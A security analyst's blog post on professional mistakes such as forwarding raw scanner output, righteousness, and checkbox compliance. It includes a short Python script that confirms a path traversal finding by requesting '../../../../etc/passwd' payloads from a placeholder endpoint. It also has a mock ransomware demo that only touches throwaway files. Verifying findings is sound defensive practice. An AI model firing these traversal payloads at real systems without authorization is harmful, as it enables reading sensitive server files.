Common Security Analyst Mistakes to Avoid

Successful security analysts understand the context of their organization. They educate colleagues about security risks. They leverage the trust they've earned to guide and advise. Here's what NOT to do on your way there!

Let me tell you a horror story about a security consultant. That person had been hired for a specific mandate. By the end of it, people were actively running away from him. They asked other security people, such as the person who told me that story, "What can I tell him to make him go away for good?"

Let that sink in. The most important output of this job is convincing people to change their behaviours, and that's true in every field of information security. How does someone fall that low?

This week, we're going to look at some major blunders security specialists make. If we are aware of these pitfalls, we're in a good spot to avoid being part of a horror story!


"I found a vulnerability in your app, please take action"

Want to make me swear? Run a free "vulnerability scanner" against my employer's websites, have ChatGPT format whatever trivial weak-cipher finding the bot spits out into an email, and beg me for a bug bounty.

I've seen so many variations on this: internal scans, external scans, consultant scans, scans from people who've just finished an "Ethical hacking 101" YouTube course...

All these share a common trait: running some automated tool and not actually trying to understand the output.

Why is this a blunder?

I shouldn't need to explain why this is awful, but since people do it so often, sometimes even as blue team specialists, here I am.

You are wasting someone else's time by being lazy. You are trusting the output of a scanner with a false-positive rate above 90%. You are shifting the burden of proof onto someone else: "My tool says you're vulnerable." Worse, I could teach my 12-year-old son to run a vulnerability scanner.

"I'm just doing what I've been told". Well, pardon my French, but your IT manager sucks.

How to fix it

"I've done a scan of your infrastructure. Amongst the findings, this error message caught my attention. Turns out your site returned an unexpected response. I did some testing, and it looks like a potential path traversal vulnerability. This could be a high-impact finding, I advise you to look into it by Friday. If you have any questions let's set up a huddle".

Compare that to: "I've done a scan of your infrastructure. Here's the 10-page report. You need to take action on any medium finding."
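What does "I did some testing" look like in practice? Below is a minimal sketch of how one might manually confirm a scanner's path traversal hit before emailing anyone. The endpoint and parameter names are hypothetical placeholders, and it goes without saying: only test systems you're authorized to test.

```python
# verify_traversal.py - a minimal sketch of manually confirming a scanner's
# path traversal finding before reporting it. The endpoint and parameter
# below are hypothetical placeholders; only test systems you are
# authorized to test.
import requests

BASE_URL = "https://app.example.com/download"  # hypothetical flagged endpoint
PARAM = "file"                                 # hypothetical flagged parameter

# Classic traversal payloads; a real test would be tailored to the target's
# OS and URL-decoding behaviour.
PAYLOADS = [
    "../../../../etc/passwd",
    "..%2f..%2f..%2f..%2fetc%2fpasswd",  # URL-encoded variant
]

def looks_like_passwd(body: str) -> bool:
    # /etc/passwd entries look like "root:x:0:0:...": a cheap heuristic,
    # not proof, but enough to separate a real hit from scanner noise.
    return "root:" in body and ":/bin/" in body

for payload in PAYLOADS:
    # Build the query string by hand so requests doesn't re-encode the payload.
    resp = requests.get(f"{BASE_URL}?{PARAM}={payload}", timeout=10)
    print(f"{payload} -> HTTP {resp.status_code}, {len(resp.content)} bytes")
    if looks_like_passwd(resp.text):
        print("Reproduced: response resembles /etc/passwd. Document and report.")
        break
else:
    print("Not reproduced; treat the scanner hit as a probable false positive.")
```

The script matters less than the habit: you show up with a reproduced result and concrete evidence, not raw scanner output.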


Righteousness

In my post Mental Health in Cybersecurity: The Hidden Threat, I told the story of fellow security analysts who burned out because they couldn't bear the reckless attitudes of some engineering leaders.

See, information security specialists value ethics and integrity. We protect the people who use our networks and applications, especially when they entrust us with their personal information, and even more so when we protect critical infrastructure!

In that context, it's easy to lose sight of the forest for the trees.

I've seen security analysts block a deployment for weeks because of a disagreement over the format of an email notification.

The common trait behind these behaviours is the spread of "FUD" (fear, uncertainty, doubt): "Wait until a breach happens, then you'll see!"

Some saw every disagreement as an argument to be "won". Others got so angry at "losing" one argument that they started resenting the company.

Why is this a blunder?

There's a fine line between being passionate and letting the profession eat you alive. What makes it worse is that, as I explained in the Mental Health piece, it's the security people who get fired when a breach occurs. So we do have a legitimate reason for righteousness!

This is almost the reverse of the first issue: here, you're bringing too much baggage to a simple problem. The intensity gives a vibe of "crying wolf".

How to fix it

It's a negotiation. Which hills will you die on, what can you compromise on, and why?

What also helps me is thinking about the larger picture: "There are forces beyond my control that will make this app go online whatever I do, so anything I gain from this point on, within a reasonable timeline, is a win." My responsibility is to bring as much data as possible to make my point clear. The outcome is not a personal failure.

Another tip: approach problems as an educator. Instead of "winning" an argument, measure success by how much understanding and security awareness people gained.


Looking for a checkmark

As a compliance specialist, my bread and butter is answering this question from engineers, ops, business analysts, and management: "Can we do this?" As in: is this behaviour allowed by our policies? Hint: most of the time people are actually asking for permission rather than guidance, but that's another debate.

Compliance gets a bad rap because it likes to deal in binaries. All communications must be encrypted. You must disable this protocol. Your passwords must be 8 characters long, have a special character, and... whatever.

Why is this a blunder?

The problem with compliance specialists and internal auditors is that they sometimes don't take a step back and ask: why do we do this? Take password policies as an example. I believe, like Microsoft, that passwordless is actually better than any password policy. You'd be surprised how many compliance specialists won't take that for an answer: "We need 90-day rotation!"
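To make the "ask why" reflex concrete with that same example: composition rules mostly reward predictable substitutions, while length plus a breached-password screen, the direction NIST SP 800-63B points in, catches what actually gets cracked. Here's a toy sketch, with a three-entry breach list standing in for a real corpus:

```python
import re

def legacy_policy(pw: str) -> bool:
    # "8 characters, a special character, and... whatever."
    return len(pw) >= 8 and bool(re.search(r"[^A-Za-z0-9]", pw))

# Illustrative stand-in; real deployments screen against large
# compromised-password corpora (e.g. the Have I Been Pwned dataset).
BREACHED = {"P@ssw0rd", "Winter2024!", "Qwerty!23"}

def modern_policy(pw: str) -> bool:
    # NIST SP 800-63B direction: favour length, screen known-breached
    # passwords, and drop arbitrary composition rules and forced rotation.
    return len(pw) >= 12 and pw not in BREACHED

for pw in ("P@ssw0rd", "correcthorsebatterystaple"):
    print(f"{pw!r}: legacy={legacy_policy(pw)}, modern={modern_policy(pw)}")
# P@ssw0rd passes the checkbox policy but sits in every cracking wordlist;
# the long passphrase fails the checkbox while being far harder to attack.
```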

I'll also venture into some "armchair psychology" if you'll indulge me. Strict compliance requirements speak to an authoritarian mindset: "This document, signed off by our bosses, says you must do this. So do it." The issue is that this mindset doesn't resonate with developers. I know it's somewhat of a cliché, but it rings true to me: developers are more "creative-minded", which means they don't deal as well with authority as, say, a military group.

How to fix it

As I wrote above: it's a negotiation. Every "checkmark" has its story: the requirement fits into a larger picture, and your company has documented risks. Tell the story behind the checkmark. Find alternative solutions proportional to the risks. Dare to explore the grey zones.


Popping a calculator

Whenever penetration testers gain full access to a system, they use their code execution to "pop" calculator.exe as a sign of triumph.

The problem, of course, is that people don't understand the idea behind the calculator: "So, code execution means opening applications on my desktop?"

I'm not saying you should show cat videos whenever you break into a website in a pentest. But we need to better frame the impacts of a successful intrusion.

I've often dismissed the idea of doing "hacking demonstrations" as part of security awareness, because I felt they portrayed security as "magic". However, given the predictable behaviour of current cybercrime threats, we should replace the calculator with a "benign", ransomware-looking demonstration that gives a sense of the actual stakes.
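For what it's worth, such a demo doesn't need real malware. Here's a minimal, hedged sketch of what I have in mind: it only touches throwaway files it creates itself in a scratch directory, "scrambles" them, and drops a mock ransom note.

```python
# A harmless "ransomware-looking" awareness demo. It only ever touches
# throwaway files it creates itself inside a temporary directory; nothing
# real is read, encrypted, or deleted.
import tempfile
from pathlib import Path

# Stage some fake "business documents" in an isolated scratch directory.
workdir = Path(tempfile.mkdtemp(prefix="ransom_demo_"))
for name in ("payroll.xlsx", "contracts.docx", "customers.csv"):
    (workdir / name).write_text(f"Pretend contents of {name}\n")

# "Lock" the throwaway files the way the audience has seen in the news:
# reversed bytes and a scary extension. Reversing is not encryption;
# that's the point, this is theatre for an awareness session.
for f in list(workdir.iterdir()):
    f.write_bytes(f.read_bytes()[::-1])
    f.rename(str(f) + ".locked")

# Drop the mock ransom note.
(workdir / "README_RESTORE_FILES.txt").write_text(
    "YOUR FILES HAVE BEEN ENCRYPTED (not really - this is a demo).\n"
    "In a real incident, this note would demand a cryptocurrency payment.\n"
)

print(f"Demo staged in {workdir}:")
for f in sorted(workdir.iterdir()):
    print(" ", f.name)
```

Seeing payroll.xlsx.locked appear next to a ransom note communicates "attacker-controlled code" far better than a calculator ever did.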

Still, even popping a plain calculator is much better than just saying: "I found a vulnerability in your website"...



🥳
Thank you for reading!

If you like my content, subscribe to the newsletter with the form below.

Cheers,
Pierre-Paul